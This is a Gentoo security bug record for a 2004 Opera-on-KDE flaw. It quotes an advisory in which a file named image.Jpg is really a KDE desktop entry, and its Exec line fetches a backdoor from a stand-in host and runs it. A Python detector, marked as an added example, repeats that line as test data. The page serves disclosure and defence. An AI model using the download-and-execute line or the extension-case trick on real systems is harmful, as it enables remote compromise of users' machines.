Bug 74321 - net-www/opera Possible execution of remote shell commands with kfmclient
Summary: net-www/opera Possible execution of remote shell commands with kfmclient
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All All
Importance: High normal
Assignee: Gentoo Security
URL: http://www.zone-h.org/advisories/read...
Whiteboard: B2 [glsa] jaervosz
Keywords:
Duplicates: 74530
Depends on:
Blocks:
 
Reported: 2004-12-13 13:31 UTC by Sune Kloppenborg Jeppesen
Modified: 2005-02-14 11:40 UTC
CC: 1 user

See Also:
Package list:
Runtime testing required: ---


Description Sune Kloppenborg Jeppesen gentoo-dev 2004-12-13 13:31:11 UTC
[ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclient.

12/12/2004
Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Tested version:
Opera 7.54 linux version with Kde 3.2.3

Problem:
========
Opera for linux uses "kfmclient exec" as "Default Application" to handle 
saved files.
This could be used by malicious remote users to execute arbitrary shell 
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
===============================

This method of exploitation requires that a particular file name extension be used.
If page.Htm is used as the file name and "kfmclient exec page.Htm" is run, the command in the "Exec=" entry will be executed.
If "page.htm" is used as the file name instead, it will not be opened as a "KDE desktop entry" but will be viewed in Konqueror.
It also works with Jpg, Gif, etc., but not with the jpg, gif extensions, since the "system" is case sensitive.


Attack scenario:

1- A user clicks on a link which requests http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field, for example "Content-Type: image/Jpeg." (note the dot at the end), so Opera will show a dialog window.

3- If the user chooses "Open" to view image.Jpg, it will be opened by the "kfmclient exec" command, since kfmclient is the "Default Application".

4- image.Jpg is a KDE desktop entry:


--------image.Jpg----------


# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is a horizontal tab.
In this case a backdoor will be downloaded onto the victim's computer and executed.


Solution:
========
Disable "kfmclient exec" as the default application.
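The advisory's point is that the hand-off to "kfmclient exec" trusts the file name (image.Jpg) while the file content is a desktop entry whose Exec= line runs. A content-based check that ignores the extension closes that gap. The block below is an added example for this bug, not code from Opera, KDE or the advisory. It assumes (not stated on the page) that a desktop entry is recognised by a "[KDE Desktop Entry]" or "[Desktop Entry]" group header with "Key=Value" lines and "#" comments, and that the Exec value is split into arguments on spaces only, which is the reading under which the advisory's tab trick makes sense (the whole "wget ...;chmod ...;./backdoor" string survives as one argument to bash -c). The sample image.Jpg is reconstructed from the advisory; the JPEG bytes are constructed.

```python
"""Content-based check for KDE desktop entries hiding behind an image extension.

Added example for Gentoo bug 74321; not code from Opera, KDE or the ZH2004-19SA
advisory. Assumptions (not from the page): desktop entries carry a
'[KDE Desktop Entry]' or '[Desktop Entry]' group, 'Key=Value' lines and '#'
comments, and the Exec value is split on spaces only.
"""

# Constructed sample, same shape as the advisory's image.Jpg (tabs written as \t).
IMAGE_JPG = (
    "# KDE Config File\n"
    "[KDE Desktop Entry]\n"
    "SwallowExec=\n"
    "MimeType=\n"
    "Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor\n"
    "Type=Application\n"
    "Terminal=0\n"
).encode()

# Constructed sample: a genuine JPEG starts with the SOI marker FF D8 FF.
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16

DESKTOP_GROUPS = ("[KDE Desktop Entry]", "[Desktop Entry]")


def parse_desktop_entry(data: bytes):
    """Return {group: {key: value}} if data parses as a desktop entry, else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None  # binary content cannot be a desktop entry
    groups = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line
            groups[current] = {}
            continue
        if current is None or "=" not in line:
            return None  # key outside a group, or junk: not a desktop entry
        key, _, value = line.partition("=")
        groups[current][key.strip()] = value  # value kept verbatim; embedded tabs matter
    if not any(g in groups for g in DESKTOP_GROUPS):
        return None
    return groups


def exec_argv(entry):
    """Split the Exec value on spaces only (assumption, see module docstring).

    With the advisory's sample this yields three arguments, the third being the
    entire tab-separated shell script handed to 'bash -c'.
    """
    for g in DESKTOP_GROUPS:
        if g in entry and "Exec" in entry[g]:
            return [tok.strip('"') for tok in entry[g]["Exec"].split(" ") if tok]
    return []


def classify(data: bytes) -> str:
    """'desktop-entry', 'image' or 'unknown', decided from content only."""
    if parse_desktop_entry(data) is not None:
        return "desktop-entry"
    if data[:3] == b"\xff\xd8\xff":
        return "image"
    return "unknown"


def safe_to_hand_off(filename: str, data: bytes) -> bool:
    """Allow a hand-off to an image viewer only when name and content agree.

    The extension is lower-cased first, so the .Jpg/.jpg case trick that the
    advisory relies on does not change the decision.
    """
    kind = classify(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if kind == "desktop-entry":
        return False  # its Exec= line would run regardless of the image-looking name
    return kind == "image" and ext in ("jpg", "jpeg")


if __name__ == "__main__":
    entry = parse_desktop_entry(IMAGE_JPG)
    print("image.Jpg is", classify(IMAGE_JPG), "-> Exec argv:", exec_argv(entry))
    print("hand off image.Jpg (desktop entry)?", safe_to_hand_off("image.Jpg", IMAGE_JPG))
    print("hand off image.Jpg (real JPEG)?", safe_to_hand_off("image.Jpg", REAL_JPG))
```

Running the block classifies the advisory's image.Jpg as a desktop entry and refuses the hand-off, while the constructed real JPEG under the same mixed-case name is allowed; the printed argv makes visible why the tabs are there.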
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2004-12-14 02:48:28 UTC
Looks real... but can't confirm as I don't use Opera.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2004-12-15 12:16:18 UTC
*** Bug 74530 has been marked as a duplicate of this bug. ***
Comment 3 Thierry Carrez (RETIRED) gentoo-dev 2004-12-21 06:29:43 UTC
This is not fixed in 7.54u1.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-11 05:17:27 UTC
Ready with bug 73871
Comment 5 Sune Kloppenborg Jeppesen gentoo-dev 2005-02-14 11:40:23 UTC
GLSA 200502-17